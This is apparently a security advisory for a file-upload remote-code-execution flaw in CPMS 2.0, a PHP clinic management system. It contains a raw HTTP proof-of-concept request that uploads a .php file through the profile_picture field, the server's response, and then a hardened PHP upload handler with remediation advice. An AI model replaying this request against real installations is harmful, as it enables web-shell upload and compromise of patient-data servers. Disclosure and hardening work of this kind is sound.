# Title: PHP - CPMS Version 2.0 File Upload and Remote Code Execution - RCE Vulnerabilities
# Author: nu11secur1ty
# Date: 12/19/2024
# Vendor: https://github.com/oretnom23
# Software: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code#comment-105951
# Reference: https://portswigger.net/web-security/file-upload & https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload

## Description:

The profile_picture parameter of update_user.php does not validate the extension of the uploaded file. A malicious admin user can upload an arbitrary PHP file to the server and execute it directly from the browser.

STATUS: HIGH-CRITICAL Vulnerability

[+]PoC:

```http
POST /pwnedhost/pms/update_user.php?user_id=1 HTTP/1.1
Host: 192.168.100.45
Cookie: PHPSESSID=9frtcadqm6q0ttavrpjquh3hif
Content-Length: 728
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: https://192.168.100.45
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2AQt0lyUq6vhBVY9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.100.45/pwnedhost/pms/update_user.php?user_id=1
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="hidden_id"

1
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="display_name"

Administrator
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="password"

------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="profile_picture"; filename="info.php"
Content-Type: application/octet-stream

------WebKitFormBoundary2AQt0lyUq6vhBVY9
Content-Disposition: form-data; name="save_user"

------WebKitFormBoundary2AQt0lyUq6vhBVY9--
```

[+]Response:

```http
HTTP/1.1 302 Found
Date: Fri, 03 Jan 2025 09:10:14 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: congratulation.php?goto_page=users.php&message=user update successfully
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 10476
```
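The root cause above is that the server accepts whatever filename and bytes arrive in the profile_picture part and writes them under the web root, where Apache hands `.php` to the interpreter. The handler below is an added example written for this page, not code from the CPMS project: the function name `store_profile_picture`, the 2 MiB cap and the upload directory are assumptions. It layers the checks a defender wants here: PHP's own upload status, an extension allow-list, a content check that ignores the client-supplied Content-Type, and a random server-chosen filename so the original name never reaches the filesystem.

```php
<?php
// Added example, not the CPMS project's code: a hardened profile_picture upload
// handler. Function name, size cap and directory path are assumptions.
declare(strict_types=1);

/**
 * Validate one $_FILES entry as an image and store it under a random name.
 * Returns the stored filename; throws RuntimeException on any rejection.
 *
 * @param array<string,mixed> $file      e.g. $_FILES['profile_picture']
 * @param string              $uploadDir directory outside the web root (or one
 *                                       where PHP execution is disabled)
 */
function store_profile_picture(array $file, string $uploadDir): string
{
    // Anything PHP itself flagged (partial upload, ini size limit, no file) is out.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or was rejected by PHP.');
    }
    // Hard size cap (assumed value: 2 MiB is plenty for an avatar).
    if ((int) $file['size'] > 2 * 1024 * 1024) {
        throw new RuntimeException('File too large.');
    }
    // Only the temp file PHP created for this request may be moved.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file.');
    }

    // 1. Extension allow-list, never a deny-list: a deny-list that blocks ".php"
    //    still lets ".phtml", ".phar" or ".php5" through on many Apache configs.
    $allowed = [
        'jpg'  => 'image/jpeg',
        'jpeg' => 'image/jpeg',
        'png'  => 'image/png',
        'gif'  => 'image/gif',
    ];
    $ext = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new RuntimeException('Extension not permitted.');
    }

    // 2. Content check on the bytes. The multipart Content-Type header
    //    ("application/octet-stream" in the PoC) is attacker-controlled and
    //    is deliberately never consulted.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        throw new RuntimeException("Content type $mime does not match .$ext.");
    }
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Not a decodable image.');
    }

    // 3. Never reuse the client's filename: random name plus the vetted extension.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = rtrim($uploadDir, '/') . '/' . $stored;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file.');
    }
    chmod($dest, 0644); // no execute bit, whatever the directory's defaults are
    return $stored;
}

// Usage in the update-user handler (assumed surrounding code):
// try {
//     $name = store_profile_picture($_FILES['profile_picture'], __DIR__ . '/../uploads_private');
//     // persist $name in the users table; serve it later via a read-only image endpoint
// } catch (RuntimeException $e) {
//     http_response_code(400);
//     echo 'Invalid profile picture.';
// }
```

Two points about the layering. The `finfo`/`getimagesize()` checks alone do not stop a polyglot (the referenced PortSwigger lab uses a file that is simultaneously a valid image and PHP source), which is why the extension allow-list and the server-generated filename carry most of the weight: a file stored as `<random>.jpg` is never dispatched to the PHP interpreter regardless of its bytes. As defence in depth, keep the upload directory outside the document root, or disable execution there with mod_php's `php_admin_flag engine off` in the `<Directory>` block, so that even a future bug in the handler cannot turn an upload into code execution; re-encoding the image through GD (`imagecreatefromstring()` followed by `imagejpeg()`/`imagepng()`) additionally strips any embedded payload from the stored copy.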